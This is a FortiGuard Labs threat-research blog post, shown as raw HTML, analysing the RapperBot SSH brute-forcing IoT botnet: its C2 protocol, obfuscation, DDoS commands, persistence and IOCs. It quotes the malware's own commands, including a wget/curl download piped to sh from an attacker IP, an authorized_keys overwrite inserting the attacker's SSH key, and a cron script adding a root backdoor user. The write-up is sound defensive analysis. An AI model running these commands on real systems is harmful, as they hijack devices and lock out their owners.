
    <!DOCTYPE HTML>
    <html lang="en" data-template="post-page">
    <head>
        
    <meta charset="UTF-8"/>
    <title>So RapperBot, What Ya Bruting For? | FortiGuard Labs</title>
    <meta name="keywords" content="iot security,FortiGuard Labs,Threat Research,malware analysis,RapperBot"/>
    <meta name="description" content="FortiGuard Labs is tracking a rapidly evolving IoT malware family known as RapperBot. Read to learn how this threat infects and persists on a victim’s device."/>
    <meta name="template" content="post-page"/>
    

    <meta name="viewport" content="width=device-width, initial-scale=1"/>


<meta name="google-site-verification" content="tiQ03tSujT2TSsWJ6tNHiiUn8cwYVmdMQrGUCNrPQmo"/>

<meta property="og:site_name" content="Fortinet Blog"/>
<meta property="og:title" content="So RapperBot, What Ya Bruting For? | FortiGuard Labs"/>
<meta property="og:url" content="https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery"/>
<meta property="og:type" content="article"/>
<meta property="og:description" content="FortiGuard Labs is tracking a rapidly evolving IoT malware family known as RapperBot. Read to learn how this threat infects and persists on a victim’s device.…"/>
<meta property="og:image" content="https://www.fortinet.com/content/dam/fortinet-blog/article-images/rapperbot-discovery-hero.jpg"/>

<meta property="twitter:card" content="summary"/>
<meta property="twitter:site" content="@Fortinet"/>

<meta property="article:author" content="Joie Salvio and Roy Tay"/>

    <meta property="article:section" content="Threat Research"/>


    <meta property="article:published_time" content="2022-08-03T16:16:00.000-07:00"/>


    <meta property="article:tag" content="iot security"/>

    <meta property="article:tag" content="FortiGuard Labs"/>

    <meta property="article:tag" content="malware analysis"/>

    <meta property="article:tag" content="RapperBot"/>


<link rel="shortcut icon" href="/etc/designs/fortinet-blog/favicon.ico"/>
<link rel="canonical" href="https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery"/>






     <link rel="stylesheet" href="/etc.clientlibs/fortinet-blog/clientlibs/clientlib-base.min.css?ver=071522" type="text/css"/>



<!-- SEO Script -->




<!-- OneTrust Cookies Consent Notice start for fortinet.com -->



    <script src="https://cdn.cookielaw.org/scripttemplates/otSDKStub.js" data-document-language="true" type="text/javascript" charset="UTF-8" data-domain-script="f85f39fc-d7aa-467a-b762-fbb722748016"></script>
    <script type="text/javascript">

function OptanonWrapper() {
    {
       try{
            $('#cookiescript_injected').remove(); // remove old cookie script
        }catch(e){}
        window.dataLayer.push({
            event: 'OneTrustGroupsUpdated'
        });
        Optanon.InsertScript('//assets.adobedtm.com/launch-EN23cb8375449840dc93b13f34d935b8b9.min.js','head',null, null, '1',true);
    }
}

</script>


<!-- OneTrust Cookies Consent Notice end for fortinet.com -->
    
    
    

    
    

    
    
    
    

    

    

    

    

    


        
            
            
                
                <!-- BE IXF: BE IXF: Place getHeadOpen just inside of the head tag -->
                
                
<!-- be_ixf, sdk, gho-->
<meta name="be:sdk" content="java_sdk_1.6.2" />
<meta name="be:timer" content="30ms" />
<meta name="be:norm_url" content="https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery" />
<meta name="be:capsule_url" content="https://ixfd-api.bc0a.com/api/ixf/1.0.0/get_capsule/f00000000216283/01727784897" />
<meta name="be:api_dt" content="pny_2022; pnm_08; pnd_16; pnh_18; pnmh_19; pn_epoch:1660699145113" />
<meta name="be:mod_dt" content="pny_1969; pnm_12; pnd_31; pnh_16; pnmh_00; pn_epoch:0" />
<meta name="be:orig_url" content="https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery" />
<meta name="be:messages" content="498414" /><style>
.be-ix-link-block{clear:both}
.be-ix-link-block .be-related-link-container{padding-bottom:20px}
.be-ix-link-block .be-related-link-container .be-label,.be-ix-link-block .be-related-link-container .be-list{font-size:.7619rem;font-family:"HelveticaNeueW01-75Bold",Helvetica,Arial,sans-serif}
.be-ix-link-block .be-related-link-container .be-label{margin:0;color:#5a646c}
.be-ix-link-block .be-related-link-container .be-list{list-style:none;margin:0;padding:0}
.be-ix-link-block .be-related-link-container .be-list .be-list-item{margin:0;padding:0;font-family:"HelveticaNeueW01-45Roma",Helvetica,Arial,sans-serif;font-size:.7619rem}
.be-ix-link-block .be-related-link-container .be-list .be-list-item a{color:#5a646c;font-family:"HelveticaNeueW01-45Roma",Helvetica,Arial,sans-serif}
@media (max-width: 767px) {
.be-ix-link-block .be-related-link-container{padding:0 10px}
.be-ix-link-block .be-related-link-container .be-label{width:100%}
.be-ix-link-block .be-related-link-container .be-list{display:block;width:100%}
.be-ix-link-block .be-related-link-container .be-list .be-list-item{display:block}
.be-ix-link-block .be-related-link-container .be-list .be-list-item:last-child{margin-bottom:0}
}
@media (min-width: 768px) {
.be-ix-link-block .be-related-link-container{display:flex}
.be-ix-link-block .be-related-link-container .be-label{display:inline-block;margin-right:20px;flex-basis:130px;flex-grow:0;flex-shrink:0}
.be-ix-link-block .be-related-link-container .be-list{display:inline-block;width:auto}
.be-ix-link-block .be-related-link-container .be-list .be-list-item{display:inline-block;margin-right:20px}
.be-ix-link-block .be-related-link-container .be-list .be-list-item:last-child{margin-right:0}
}
</style>


<script data-cfasync="false" id="marvel" data-customerid="f00000000216283" src="https://marvel-b2-cdn.bc0a.com/marvel.js"></script>

            
        

    </head>
    <body>
    



    
<div class="root responsivegrid">


<div class="aem-Grid aem-Grid--12 aem-Grid--default--12 ">
    
    <div class="b1-header aem-GridColumn aem-GridColumn--default--12">


<header class="b1-header__container">
    <div class="b1-header__logo">
        <a href="https://www.fortinet.com">
            
            <img class="desktop-logo" src="/content/dam/fortinet-blog/fortinet-logo-white.svg" alt="So RapperBot, What Ya Bruting For? | FortiGuard Labs"/>
            <img class="mobile-logo" src="/content/dam/fortinet-blog/fortinet-logo-white.svg" alt="So RapperBot, What Ya Bruting For? | FortiGuard Labs"/>
        </a>
    </div>

    <div class="b1-header__cta-list">
      <a class="b1-header__cta-list-item " href="https://www.fortinet.com/blog">
          <span>Blog</span>
      </a>
    </div>

    <div class="b1-header__nav"><div class="b2-navigation">




    <ul class="b2-navigation__list">
        
            <li class="b2-navigation-categories"><div class="b2-navigation__list-item nav-dropdown-title">Categories</div>
                <ul class="navdropdown">
                    
                        <li>
                            <a class="b2-navigation__dropdown__list-item" href="/blog/business-and-technology">
                                <span>Business &amp; Technology </span>
                            </a>
                        </li>
                    
                
                    
                        <li>
                            <a class="b2-navigation__dropdown__list-item" href="/blog/threat-research">
                                <span>Threat Research</span>
                            </a>
                        </li>
                    
                
                    
                        <li>
                            <a class="b2-navigation__dropdown__list-item" href="/blog/industry-trends">
                                <span>Industry Trends</span>
                            </a>
                        </li>
                    
                
                    
                        <li>
                            <a class="b2-navigation__dropdown__list-item" href="/blog/partners">
                                <span>Partners</span>
                            </a>
                        </li>
                    
                
                    
                        <li>
                            <a class="b2-navigation__dropdown__list-item" href="/blog/customer-stories">
                                <span>Customer Stories</span>
                            </a>
                        </li>
                    
                
                    
                        <li>
                            <a class="b2-navigation__dropdown__list-item" href="/blog/psirt-blogs">
                                <span>PSIRT Blogs</span>
                            </a>
                        </li>
                    
                </ul>
            </li>

        
            <li class="m-nav-item">
                <a class="b2-navigation__list-item false" href="/blog/business-and-technology">
                    <span>Business &amp; Technology </span>
                </a>
            </li>
        
            <li class="m-nav-item">
                <a class="b2-navigation__list-item false" href="/blog/threat-research">
                    <span>Threat Research</span>
                </a>
            </li>
        
            <li class="m-nav-item">
                <a class="b2-navigation__list-item false" href="/blog/industry-trends">
                    <span>Industry Trends</span>
                </a>
            </li>
        
            <li class="m-nav-item">
                <a class="b2-navigation__list-item false" href="/blog/partners">
                    <span>Partners</span>
                </a>
            </li>
        
            <li class="m-nav-item">
                <a class="b2-navigation__list-item false" href="/blog/customer-stories">
                    <span>Customer Stories</span>
                </a>
            </li>
        
            <li class="m-nav-item">
                <a class="b2-navigation__list-item false" href="/blog/psirt-blogs">
                    <span>PSIRT Blogs</span>
                </a>
            </li>
        
        
        
            <li>
                <a class="b2-navigation__list-item false" href="/blog/ciso-collective">
                    <span>CISO Collective</span>
                </a>
            </li>
        
    </ul>


    

</div>
</div>

    <div class="b1-header__search"><div class="b3-searchbox">


<form class="b3-searchbox__form" action="/blog/search" method="get">
    <input class="b3-searchbox__input" type="text" name="q" placeholder="Search Blogs"/>
    <button class="b3-searchbox__icon" aria-label="Search" type="submit">
        
    <svg viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg">
        <path d="M15.688 14.18l-4.075-4.075C12.36 9.06 12.8 7.78 12.8 6.4 12.8 2.87 9.93 0 6.4 0 2.87 0 0 2.87 0 6.4c0 3.53 2.87 6.4 6.4 6.4 1.38 0 2.66-.44 3.705-1.187l4.075 4.075c.207.208.48.312.753.312.274 0 .547-.104.755-.312.416-.417.416-1.093 0-1.51zM2.133 6.4c0-2.357 1.91-4.267 4.267-4.267s4.267 1.91 4.267 4.267-1.91 4.267-4.267 4.267S2.133 8.757 2.133 6.4z" fill="#fff">
        </path>
    </svg>

    </button>
</form>


    

</div>
</div>

    <div class="b1-header__search-toggle">
        
    <svg viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg">
        <path d="M15.688 14.18l-4.075-4.075C12.36 9.06 12.8 7.78 12.8 6.4 12.8 2.87 9.93 0 6.4 0 2.87 0 0 2.87 0 6.4c0 3.53 2.87 6.4 6.4 6.4 1.38 0 2.66-.44 3.705-1.187l4.075 4.075c.207.208.48.312.753.312.274 0 .547-.104.755-.312.416-.417.416-1.093 0-1.51zM2.133 6.4c0-2.357 1.91-4.267 4.267-4.267s4.267 1.91 4.267 4.267-1.91 4.267-4.267 4.267S2.133 8.757 2.133 6.4z">
        </path>
    </svg>

        <div class="b1-header__search-toggle-close">
            <span class="b1-header__search-toggle-close-line"></span>
            <span class="b1-header__search-toggle-close-line"></span>
        </div>
    </div>

    <div class="b1-header__nav-toggle" aria-hidden="true">
        <span class="b1-header__nav-toggle-line"></span>
        <span class="b1-header__nav-toggle-line"></span>
        <span class="b1-header__nav-toggle-line"></span>
    </div>
</header>

    

</div>
<section class="b4-hero aem-GridColumn aem-GridColumn--default--12">



<div class="b4-hero__container" style="background-image:url(/content/dam/fortinet-blog/article-images/rapperbot-discovery-hero.jpg);">
    <img class="ratio" alt="So RapperBot, What Ya Bruting For? | FortiGuard Labs" aria-hidden="true" src=""/>
    <div class="b4-hero__text text-container">
        <p data-ly-test class="b4-hero__kicker">Threat Research</p>
        
        
        <h1 class="b4-hero__headline">So RapperBot, What Ya Bruting For?</h1>
        
    </div>
</div>
</section>
<section class="b15-blog-meta aem-GridColumn aem-GridColumn--default--12">

<div class="b15-blog-meta__container text-container">
    <span>By </span>

    <span class="b15-blog-meta__author">

        
					

                        

                                  
                                      
                                            
                                          
                                              <a href="/blog/search?author=Joie+Salvio">Joie Salvio</a> and
                                          
                                           
                                      
                                  
                          

                                  
                                      
                                            
                                              <a href="/blog/search?author=Roy+Tay">Roy Tay</a>
                                          
                                          
                                           
                                      
                                  
                          
                    
        
    </span>
    <span class="b15-blog-meta__">
        

              </span>



    <span class="b15-blog-meta__date"> | August 03, 2022</span>
</div>
</section>
<div class="responsivegrid aem-GridColumn aem-GridColumn--default--12">


<div class="aem-Grid aem-Grid--12 aem-Grid--default--12 ">
    
    <div class="raw-import aem-GridColumn aem-GridColumn--default--12">
<div class="text-container"></div>
</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p>FortiGuard Labs has been tracking a rapidly evolving IoT malware family known as “RapperBot” since mid-June 2022. This family borrows heavily from the original Mirai source code, but what separates it from other IoT malware families is its built-in capability to brute force credentials and gain access to SSH servers instead of Telnet as implemented in Mirai.</p>
<p>In addition, recent samples show that its developers have started adding code to maintain persistence, which is rarely done in other Mirai variants. This provides threat actors with continued access to infected devices via SSH even after the device is rebooted or the malware has been removed.</p>
<p style="margin-left: 40.0px;"><b>Affected Platforms:</b> Linux<br />
<b>Impacted Users:</b> Any organization<br />
<b>Impact:</b> Remote attackers gain control of the vulnerable systems<br />
<b>Severity Level:</b> Critical</p>
<p>This article reveals how this threat infects and persists on a victim device, as well as interesting changes that make us question the real intention of the threat actors.</p>
<h2>Discovery</h2>
<p>In June 2022, FortiGuard Labs encountered IoT malware samples with SSH-related strings, something not often seen in other IoT threat campaigns. What piqued our interest more was the size of the code referencing these strings in relation to the code used for DDoS attacks, which usually comprises most of the code in other variants.</p>
<p>Upon further analysis, we discovered that this malware family, dubbed &quot;RapperBot,” is designed to function primarily as an SSH brute forcer with limited DDoS capabilities. As is typical of most IoT malware, it targets ARM, MIPS, SPARC, and x86 architectures.</p>
<p>The name “RapperBot” comes from an early July report from <a href="https://www.ics-cert.org.cn/portal/page/112/1208496c5e164aceb8dadd08ab993dd2.html">CNCERT</a> where an embedded URL to a YouTube rap music video was found in older samples. The samples of RapperBot released after this report do not contain this URL.</p>
<h2>Hello From the Other Side</h2>
<p>RapperBot heavily reuses parts of the Mirai source code, but its features and implementation details, e.g., the Command &amp; Control (C2) command protocol, differs significantly from the original Mirai and typical Mirai-based variants monitored by FortiGuard Labs.</p>
<p>Unlike the majority of Mirai variants, which natively brute force Telnet servers using default or weak passwords, RapperBot exclusively scans and attempts to brute force SSH servers configured to accept password authentication. The bulk of the malware code contains an implementation of an SSH 2.0 client that can connect and brute force any SSH server that supports Diffie-Hellmann key exchange with 768-bit or 2048-bit keys and data encryption using AES128-CTR.</p>
<p>A distinctive feature of the brute forcing implementation in RapperBot is the use of “SSH-2.0-HELLOWORLD” to identify itself to the target SSH server during the SSH Protocol Exchange phase. The appearance of this RapperBot in mid-June coincides with the observation of this same client identification string by <a href="https://isc.sans.edu/diary/Analysis+of+SSH+Honeypot+Data+with+PowerBI/28872">SANS Internet Storm Center</a> in their honeypot logs.</p>
<p>Earlier samples had the brute-forcing credential list hardcoded into the binary. From July onwards, samples now retrieve this list from another port on the C2 server. This allows the threat actors to continually add new SSH credentials without having to update infected devices with new samples. This port number ranges from 4343 to 4345 in the latest samples.</p>
<p>Once RapperBot successfully brute forces an SSH server, the valid credentials are reported to the C2 server on a separate port (currently 48109) without executing further commands on the remote victim.</p>
<p>In late June, however, FortiGuard Labs found some samples that attempted to self-propagate via a remote binary downloader post-compromise. The commands executed on the compromised SSH server are shown below.</p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p style="margin-left: 40.0px;"><span style="font-size: 14.0px;"><span style="font-family: Consolas;"><span style="color: black;">sh</span></span><br />
 <span style="font-family: Consolas;"><span style="color: black;">enable</span></span><br />
 <span style="font-family: Consolas;"><span style="color: black;">shell</span></span><br />
 <span style="font-family: Consolas;"><span style="color: black;">debug shell</span></span><br />
 <span style="font-family: Consolas;"><span style="color: black;">cmd</span></span><br />
 <br />
 <span style="font-family: Consolas;"><span style="color: black;">wget http://2[.]58[.]149[.]116/w -O- | sh; curl http://2[.]58[.]149[.]116/c -O- |  sh</span></span></span></p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p>For unknown reasons, this propagation functionality was removed in samples collected a few days later and has not been seen in subsequent samples. As with the original Mirai, we suspect the threat actors have implemented a separate loader system that would subsequently connect to the victim to download and execute the bot client.</p>
<h2>Never Gonna Give You Up</h2>
<p>Since mid-July, RapperBot has switched from self-propagation to maintaining remote access into the brute-forced SSH servers. It runs a shell command to replace remote victims’ ~/.ssh/authorized_keys with one containing the threat actors’ SSH public key with the comment “helloworld,” as shown below.</p>


</div>
<div class="raw-import aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--12 aem-GridColumn--offset--default--0">
<div class="text-container"><p style="margin-left:40px"><span style="font-size:14px"><span style="font-family:Calibri,sans-serif"><span style="font-family:Consolas"><span style="color:black">cd ~ &amp;&amp; rm -rf .ssh &amp;&amp; mkdir .ssh &amp;&amp; echo &quot;ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vs Hc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweY qTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1J FJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziis Zze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v 2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ== helloworld&quot;&gt;&gt;.ssh/authorized_keys &amp;&amp; chmod -R go= ~/.ssh &amp;&amp; cd ~;</span></span></span></span></p>
</div>
</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p>Public keys stored in ~/.ssh/authorized_keys allow anyone with the corresponding private key to connect and authenticate to a SSH server without needing to supply a password. This presents a threat to compromised SSH servers as threat actors can access them even after SSH credentials have been changed or SSH password authentication is disabled. Moreover, since the file is replaced, all existing authorized keys are deleted, which prevents legitimate users from accessing the SSH server via public key authentication.</p>
<p>Apart from maintaining access to every SSH server that it brute forces, RapperBot is also very intent on retaining its foothold on any devices on which it is executed. Samples from mid-July append the same aforementioned SSH key to the local &quot;~/.ssh/authorized_keys&quot; on the infected device upon execution. This allows RapperBot to maintain its access to these infected devices via SSH even after a device reboot or the removal of RapperBot from the device – something that is atypical to most Mirai variants. In an attempt to better hide in plain sight, the latest samples use a more innocuous comment &quot;system key generated by server 20220709&quot; for the public key instead of “helloworld.”</p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p>In the latest RapperBot samples, the malware also started adding the root user &quot;suhelper” to the infected device by directly writing to “/etc/passwd” and “/etc/shadow/”, further allowing the threat actor to take complete control of the device. In conjunction, it adds the root user account every hour by writing the following script to “/etc/cron.hourly/0” in the event that other users (or botnets) attempt to remove their account from the victim system. The command to add the root user is provided below.</p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;"><span style="color: black;">#!/bin/sh</span></span><br />
 <br />
 <span style="font-family: Consolas;"><span style="color: black;">useradd -u 0 -g 0 -o -d / suhelper -p '$1$1OJBlhUV$E9DMK0xdoZb8W8wVOibPQ/' &gt;/dev/null 2&gt;&amp;1</span></span></span></span></p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p>Figure 1 illustrates how the latest samples of RapperBot work. Dotted lines indicate potential actions that FortiGuard Labs assesses that the threat actor could perform but have not been observed in the wild.</p>


</div>
<div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2">

    
        <noscript data-cmp-image="{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}">
            <img src="/blog/threat-research/rapperbot-malware-discovery/_jcr_content/root/responsivegrid/image.img.png/1659483943925/fig1.png" alt="RapperBot execution flow"/>
        </noscript>
    
    <span class="cmp-image--title">Figure 1: RapperBot execution flow</span>


    

</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <h2>You Can’t See Me</h2>
<p>While early samples had strings in plaintext, subsequent samples added extra obfuscation to the strings by building them on the stack. This prevents common analysis tools and detection techniques from extracting human-readable strings from binary files (Figure 2).</p>


</div>
<div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2">

    
        <noscript data-cmp-image="{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}">
            <img src="/blog/threat-research/rapperbot-malware-discovery/_jcr_content/root/responsivegrid/image_415238308.img.png/1659483966370/fig2.png" alt="String encoding in RapperBot samples"/>
        </noscript>
    
    <span class="cmp-image--title">Figure 2: String encoding in RapperBot samples</span>


    

</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p>Furthermore, these latest samples implemented an additional layer of Mirai-style XOR encoding to hide these strings from memory scanners during execution.</p>
<p>While most Mirai and Gafgyt botnet operators, like <a href="https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet">Keksec</a>, tend to include strings identifying themselves within the malware samples, the developers of this malware maintain a relatively low profile (apart from occasional references to rap music).</p>
<h2>Network Protocol</h2>
<p>RapperBot communicates with its C2 server via TCP requests at separate ports to receive commands (443 in the latest samples), download SSH credential lists, or report valid credentials during SSH brute forcing.</p>
<p>The network protocol for commands is explained in further detail below.</p>
<p>Each request contains a bot ID, a 32-byte value hardcoded in the binary. FortiGuard Labs observed two IDs as follows:</p>
<p style="margin-left: 40.0px;">d4 1c 74 44 70 95 28 ff f0 98 ae 4e 6f 92 ba d5 0f cd 56 29 c5 12 53 a1 fe 46 53 c7 0b b5 18 27</p>
<p style="margin-left: 40.0px;">f6 b7 0b 00 14 77 35 f9 8d 6d 5d c4 bd 23 88 7e cf 5e 02 ce 54 5f e7 b1 e6 3f 2a 16 71 b6 eb 9a (a separate cluster seen only in late December 2021)</p>
<p>As a side note, pivoting on these bot IDs allowed us to find older samples from November 2021. However, the SSH brute forcing capability was only seen in samples from mid-June 2022.</p>
<p>RapperBot starts by sending a registration packet to the C2 server. This includes the argument (referred to as “source” by Mirai) used when the binary was executed in the victim system, which usually provides some basic contextual info about its execution. For instance, “ssh.wget.arm7” would tell the C2 that the binary was spread via SSH protocol, downloaded via the wget utility, and is of ARM architecture.</p>
<p>The succeeding communication uses the following structure:</p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;">struct rapperbot_registration {</span></span></span></p>
<p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;">    byte bot_id[32];</span></span></span></p>
<p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;">    int command_code;</span></span></span></p>
<p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;">    source [32];</span></span></span></p>
<p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;">};</span></span></span></p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p>Here are the command codes supported by RapperBot:</p>
<ul>
<li><b>0x00</b>: Register (used by the client)</li>
<li><b>0x01</b>: Keep-Alive/Do nothing<b></b></li>
<li><b>0x02:</b> Stop all DoS attacks and terminate the client<b></b></li>
<li><b>0x03</b>: Perform a DoS attack<b></b></li>
<li><b>0x04</b>: Stop all DoS attacks<b></b></li>
</ul>
<p>Right after the registration packet, the client sends another request to notify the C2 that the client is ready to receive commands. The C2 server usually responds with a keep-alive command to acknowledge the request (Figure 3).</p>


</div>
<div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2">

    
        <noscript data-cmp-image="{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}">
            <img src="/blog/threat-research/rapperbot-malware-discovery/_jcr_content/root/responsivegrid/image_741407087.img.png/1659483997934/fig3.png" alt="RapperBot client-server communication"/>
        </noscript>
    
    <span class="cmp-image--title">Figure 3: RapperBot client-server communication</span>


    

</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p>Besides the keep-alive command, we did not observe any other commands from the C2 server during our analysis.</p>
<p>However, RapperBot does support a very minimal set of DoS attacks, including plain UDP and TCP STOMP flood attacks that are very similar to Mirai’s implementation.</p>
<p>The attack command structure is as follows:</p>
<p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;">struct rapperbot_attack_command {</span></span></span></p>
<p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;">    byte bot_id[32];</span></span></span></p>
<p style="margin-left: 48.0px;"><span style="font-size: 14.0px;"><span style="font-family: Calibri , sans-serif;"><span style="font-family: Consolas;">    int command_code;  // 0x03</span><br />
 <span style="font-family: Consolas;">    byte vector; // type of DoS attack</span><br />
 <span style="font-family: Consolas;">    ushort target_port;</span><br />
 <span style="font-family: Consolas;">    int duration;</span><br />
 <span style="font-family: Consolas;">    int target_ip;</span><br />
 <span style="font-family: Consolas;">};</span></span></span><br />
 </p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <h2>Mystery Motivation</h2>
<p>FortiGuard Labs has been monitoring this threat for over a month. During that time, it has undergone several interesting changes that raise more questions than answers when attempting to pinpoint the primary motivation of the threat actors in launching this campaign.</p>
<p>At one point, samples were observed where the DDoS attack capabilities were entirely removed and added back a week later. Could the DDoS functionality have been retained for masquerading as a typical DDoS botnet to avoid drawing too much attention? It is also possible that this whole campaign is still a work in progress.</p>
<p>Additionally, self-propagation was removed after a few days in late June, with the current focus on aggressively retaining continued access to brute-forced SSH servers. Are the threat actors more interested in collecting compromised SSH devices than expanding their botnet?</p>
<p>On top of that, we have not seen additional payloads delivered after brute forcing. We can only speculate on why the threat actors are amassing a rapidly growing collection of compromised SSH servers. Over 3,500 unique IPs have been observed in the past 1.5 months attempting to scan and brute-force SSH servers with the SSH-2.0-HELLOWORLD client identification string. IPs from the US, Taiwan, and South Korea comprised half of the observed IPs (Figure 4).</p>


</div>
<div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--default--3">

    
        <noscript data-cmp-image="{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}">
            <img src="/blog/threat-research/rapperbot-malware-discovery/_jcr_content/root/responsivegrid/image_467426396.img.png/1659484018517/fig4.png" alt="Scanner IP Count from mid-June 2022 to late July 2022"/>
        </noscript>
    
    <span class="cmp-image--title">Figure 4: Scanner IP Count from mid-June 2022 to late July 2022</span>


    

</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <h2><a href="https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/unusual-mirai-variant-looks-for-mining-infrastructure/ba-p/2756669"></a>Conclusion</h2>
<p>Although this threat heavily borrows code from Mirai, it has features that set it apart from its predecessor and its variants. Its ability to persist in the victim system gives threat actors the flexibility to use them for any malicious purpose they desire.</p>
<p>Due to some significant and curious changes that RapperBot has undergone, its primary motivation is still a bit of a mystery. Regardless, since its primary propagation method is brute forcing SSH credentials, this threat can easily be mitigated by setting strong passwords for devices or disabling password authentication for SSH (where possible).</p>
<p>FortiGuard Labs will continue to monitor RapperBot’s development.</p>
<h2>Fortinet Protections</h2>
<p>Fortinet customers are protected by the following:</p>
<ul>
<li>The FortiGuard Antivirus service detects and blocks this threat as ELF/Mirai and Linux/Mirai.</li>
<li>The FortiGuard Web Filtering Service blocks the C2 servers and downloaded URLs.</li>
</ul>
<p><a href="https://www.fortinet.com/support/support-services/fortiguard-security-subscriptions/ipreputation-antibot">FortiGuard IP Reputation and Anti-Botnet Security Service</a> proactively block these attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.</p>
<h2>IOCs</h2>
<h3>Files</h3>
<p>92ae77e9dd22e7680123bb230ce43ef602998e6a1c6756d9e2ce5822a09b37b4<br />
a31f4caa0be9e588056c92fd69c8ac970ebc7e85a68615b1d9407a954d4df45d<br />
e8d06ac196c7852ff71c150b2081150be9996ff670550717127db8ab855175a8<br />
23a415d0ec6d3131f1d537836d3c0449097e98167b18fbdbf2efca789748818a<br />
c83f318339e9c4072010b625d876558d14eaa0028339db9edf12bbcafe6828bb<br />
05c78eaf32af9647f178dff981e6e4e43b1579d95ccd4f1c2f1436dbfa0727ad<br />
88bbb772b8731296822646735aacbfb53014fbb7f90227b44523d7577e0a7ce6<br />
e8f1e8ec6b94ea54488d5f714e71e51d58dcdfe4be3827c55970d6f3b06edf73<br />
23256f231f3d91b0136b44d649b924552607a29b43a195024dbe6cde5b4a28ad<br />
77b2e5fb5b72493bde35a6b29a66e6250b6a5a0c9b9c5653957f64a12c793cd5<br />
dcdeedee4736ec528d1a30a585ec4a1a4f3462d6d25b71f6c1a4fef7f641e7ae<br />
ebb860512a55c1cdc8be1399eec44c4481aedb418f15dbda4612e6d38e9b9010<br />
9d234e975e4df539a217d1c4386822be1f56cea35f7dd2aa606ae4995894da42<br />
1975851c916587e057fa5862884cbac3fa1e80881ddd062392486f5390c86865<br />
8380321c1bd250424a0a167e0f319511611f73b53736895a8d3a2ad58ffcd5d5<br />
f5ff9d1261af176d7ff1ef91aa8c892c70b40caa02c17a25de22539e9d0cdd26<br />
2298071b6ba7baa5393be064876efcdbd9217c212e0c764ba62a6f0ffc83cc5a<br />
